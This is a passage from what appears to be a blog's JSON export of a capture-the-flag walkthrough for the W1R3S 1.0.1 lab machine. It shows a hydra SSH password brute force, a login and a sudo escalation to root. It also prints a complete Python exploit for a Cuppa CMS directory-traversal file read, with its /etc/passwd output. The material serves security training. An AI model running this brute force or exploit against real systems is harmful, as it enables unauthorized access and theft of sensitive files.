obtain the <strong>w1r3s<\/strong> user. To make things easier, I wrote Python code for this and submitted it to Exploit-DB.<\/p>\n<p>After that, I ran another attack with hydra.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# hydra -L users -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/192.168.6.135\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-07-10 20:01:47\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking ssh:\/\/192.168.6.135:22\/\n[22][ssh] host: 192.168.6.135   login: w1r3s   password: computer\n1 of 1 target successfully completed, 1 valid password found\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\n[ERROR] 1 target did not resolve or could not be connected\n[ERROR] 0 target did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-07-10 20:02:32\n<\/code><\/pre>\n<p>Now we can log in.<\/p>\n<pre><code class=\"language-sh\">\u2514\u2500# ssh w1r3s@192.168.6.135\n----------------------\nThink this is the way?\n----------------------\nWell,........possibly.\n----------------------\nw1r3s@192.168.6.135&#039;s password: \nWelcome to Ubuntu 16.04.3 LTS (GNU\/Linux 4.13.0-36-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n644 packages can 
be updated.\n490 updates are security updates.\n\nNew release &#039;18.04.5 LTS&#039; available.\nRun &#039;do-release-upgrade&#039; to upgrade to it.\n\n.....You made it huh?....\nLast login: Sat Jul 10 17:41:48 2021 from 192.168.6.132\nw1r3s@W1R3S:~$ id\nuid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\nw1r3s@W1R3S:~$ sudo su\n[sudo] password for w1r3s: \nroot@W1R3S:\/home\/w1r3s# cd \/root\nroot@W1R3S:~# ls\nflag.txt\nroot@W1R3S:~# cat flag.txt \n-----------------------------------------------------------------------------------------\n   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  \n  \/ ___\/ _ \\| \\ | |\/ ___|  _ \\    \/ \\|_   _| | | | |      \/ \\|_   _|_ _\/ _ \\| \\ | \/ ___| \n | |  | | | |  \\| | |  _| |_) |  \/ _ \\ | | | | | | |     \/ _ \\ | |  | | | | |  \\| \\___ \\ \n | |__| |_| | |\\  | |_| |  _ &lt;  \/ ___ \\| | | |_| | |___ \/ ___ \\| |  | | |_| | |\\  |___) |\n  \\____\\___\/|_| \\_|\\____|_| \\_\\\/_\/   \\_\\_|  \\___\/|_____\/_\/   \\_\\_| |___\\___\/|_| \\_|____\/ \n\n-----------------------------------------------------------------------------------------\n\n                          .-----------------TTTT_-----_______\n                        \/&#039;&#039;&#039;&#039;&#039;&#039;&#039;&#039;&#039;&#039;(______O] ----------____  \\______\/]_\n     __...---&#039;&quot;&quot;&quot;\\_ --&#039;&#039;   Q                               ___________@\n |&#039;&#039;&#039;                   ._   _______________=---------&quot;&quot;&quot;&quot;&quot;&quot;&quot;\n |                ..--&#039;&#039;|   l L |_l   |\n |          ..--&#039;&#039;      .  
\/-___j &#039;   &#039;\n |    ..--&#039;&#039;           \/  ,       &#039;   &#039;\n |--&#039;&#039;                \/           `    \\\n                      L__&#039;         \\    -\n                                    -    &#039;-.\n                                     &#039;.    \/\n                                       &#039;-.\/\n\n----------------------------------------------------------------------------------------\n  YOU HAVE COMPLETED THE\n               __      __  ______________________   _________\n              \/  \\    \/  \\\/_   \\______   \\_____  \\ \/   _____\/\n              \\   \\\/\\\/   \/ |   ||       _\/ _(__  &lt; \\_____  \\ \n               \\        \/  |   ||    |   \\\/       \\\/        \\\n                \\__\/\\  \/   |___||____|_  \/______  \/_______  \/.INC\n                     \\\/                \\\/       \\\/        \\\/        CHALLENGE, V 1.0\n----------------------------------------------------------------------------------------\n\nCREATED BY SpecterWires\n\n----------------------------------------------------------------------------------------\nroot@W1R3S:~# \n<\/code><\/pre>\n<p>The user is in the sudo group \ud83d\ude42<\/p>\n<p>Note: The exploit I wrote is given below.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cat Cuppa_CMS_File_Inclusion.py \nimport requests\nimport urllib.parse\nfrom bs4 import BeautifulSoup\n\ndef exploit(url):\n    # Build the endpoint URL once; inside the loop it would be appended again on every pass\n    url = url + &quot;alerts\/alertConfigField.php&quot;\n    while(1):\n        path = input(&quot;[*] Enter the full path of the file you want to read.\\r\\n&gt;&gt; &quot;)\n        data = {&#039;urlConfig&#039;: &#039;..\/&#039;*10+path}\n        headers = {&#039;Content-type&#039;: &#039;application\/x-www-form-urlencoded&#039;}\n        print(&quot;[*] Your payload:&quot;, urllib.parse.urlencode(data))\n        r = requests.post(url, headers=headers, data=data)\n        
html_doc = r.text\n        soup = BeautifulSoup(html_doc, &#039;html.parser&#039;)\n        print(soup.find(id=&quot;content_alert_config&quot;).text)\n\ndef main():\n    ip = input(&quot;[*] Enter the target ip adress.\\r\\n&gt;&gt; &quot;)\n    list = &quot;1. http:\/\/{0}\/\\r\\n2. http:\/\/{0}\/administator\/\\r\\n3. http:\/\/{0}\/cuppa\/\\r\\n4. Other&quot;.format(ip)\n    host = int(input(&quot;[*] The target address is similar to which of the following?\\r\\n{0}\\r\\n&gt;&gt; &quot;.format(list)))\n    switcher = {\n            1: &quot;http:\/\/{0}\/&quot;.format(ip),\n            2: &quot;http:\/\/{0}\/administrator\/&quot;.format(ip),\n            3: &quot;http:\/\/{0}\/cuppa\/&quot;.format(ip)\n        }\n    if(host&lt;4 and host&gt;0):\n        exploit(switcher.get(host))\n    elif(host == 4):\n        exploit(input(&quot;[*] Enter the URL\\r\\n&gt;&gt; &quot;))\n    else:\n        print(&quot;[*] Incorrect operation&quot;)\n        exit()\nmain()\n\n&quot;&quot;&quot;\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# python3 Cuppa_CMS_File_Inclusion.py\n[*] Enter the target ip adress.\n>&gt; 192.168.6.135\n[*] The target address is similar to which of the following?\n1. http:\/\/192.168.6.135\/\n2. http:\/\/192.168.6.135\/administator\/\n3. http:\/\/192.168.6.135\/cuppa\/\n4. 
Other\n>&gt; 2\n[*] Enter the full path of the file you want to read.\n>&gt; \/etc\/passwd\n[*] Your payload: urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd\n\n        root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:103:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false\nsyslog:x:104:108::\/home\/syslog:\/bin\/false\n_apt:x:105:65534::\/nonexistent:\/bin\/false\nmessagebus:x:106:110::\/var\/run\/dbus:\/bin\/false\nuuidd:x:107:111::\/run\/uuidd:\/bin\/false\nlightdm:x:108:114:Light Display Manager:\/var\/lib\/lightdm:\/bin\/false\ndnsmasq:x:112:65534:dnsmasq,,,:\/var\/lib\/misc:\/bin\/false\ncolord:x:113:123:colord colour management daemon,,,:\/var\/lib\/colord:\/bin\/false\nspeech-dispatcher:x:114:29:Speech 
Dispatcher,,,:\/var\/run\/speech-dispatcher:\/bin\/false\nhplip:x:115:7:HPLIP system user,,,:\/var\/run\/hplip:\/bin\/false\nusbmux:x:120:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/bin\/false\nsshd:x:121:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\nftp:x:122:129:ftp daemon,,,:\/srv\/ftp:\/bin\/false\nmysql:x:123:130:MySQL Server,,,:\/nonexistent:\/bin\/false\n&quot;&quot;&quot;\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# python3 Cuppa_CMS_File_Inclusion.py\n[*] Enter the target ip adress.\n>&gt; 192.168.6.135\n[*] The target address is similar to which of the following?\n1. http:\/\/192.168.6.135\/\n2. http:\/\/192.168.6.135\/administator\/\n3. http:\/\/192.168.6.135\/cuppa\/\n4. Other\n>&gt; 2\n[*] Enter the full path of the file you want to read.\n>&gt; \/etc\/passwd\n[*] Your payload: urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd\n\n        root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:102:systemd Time 
Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:103:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false\nsyslog:x:104:108::\/home\/syslog:\/bin\/false\n_apt:x:105:65534::\/nonexistent:\/bin\/false\nmessagebus:x:106:110::\/var\/run\/dbus:\/bin\/false\nuuidd:x:107:111::\/run\/uuidd:\/bin\/false\nlightdm:x:108:114:Light Display Manager:\/var\/lib\/lightdm:\/bin\/false\nwhoopsie:x:109:117::\/nonexistent:\/bin\/false\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/bin\/false\navahi:x:111:120:Avahi mDNS daemon,,,:\/var\/run\/avahi-daemon:\/bin\/false\ndnsmasq:x:112:65534:dnsmasq,,,:\/var\/lib\/misc:\/bin\/false\ncolord:x:113:123:colord colour management daemon,,,:\/var\/lib\/colord:\/bin\/false\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:\/var\/run\/speech-dispatcher:\/bin\/false\nhplip:x:115:7:HPLIP system user,,,:\/var\/run\/hplip:\/bin\/false\nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:\/:\/bin\/false\npulse:x:117:124:PulseAudio daemon,,,:\/var\/run\/pulse:\/bin\/false\nrtkit:x:118:126:RealtimeKit,,,:\/proc:\/bin\/false\nsaned:x:119:127::\/var\/lib\/saned:\/bin\/false\nusbmux:x:120:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/bin\/false\nw1r3s:x:1000:1000:w1r3s,,,:\/home\/w1r3s:\/bin\/bash\nsshd:x:121:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\nftp:x:122:129:ftp daemon,,,:\/srv\/ftp:\/bin\/false\nmysql:x:123:130:MySQL Server,,,:\/nonexistent:\/bin\/false\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Machine Information Description: You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. 
They have asked&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/11\/w1r3s-1-0-1\/\">Continue reading <span class=\"screen-reader-text\">W1R3S: 1.0.1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[559],"class_list":["post-1330","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-cuppa","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1330"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1330\/revisions"}],"predecessor-version":[{"id":1331,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1330\/revisions\/1331"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}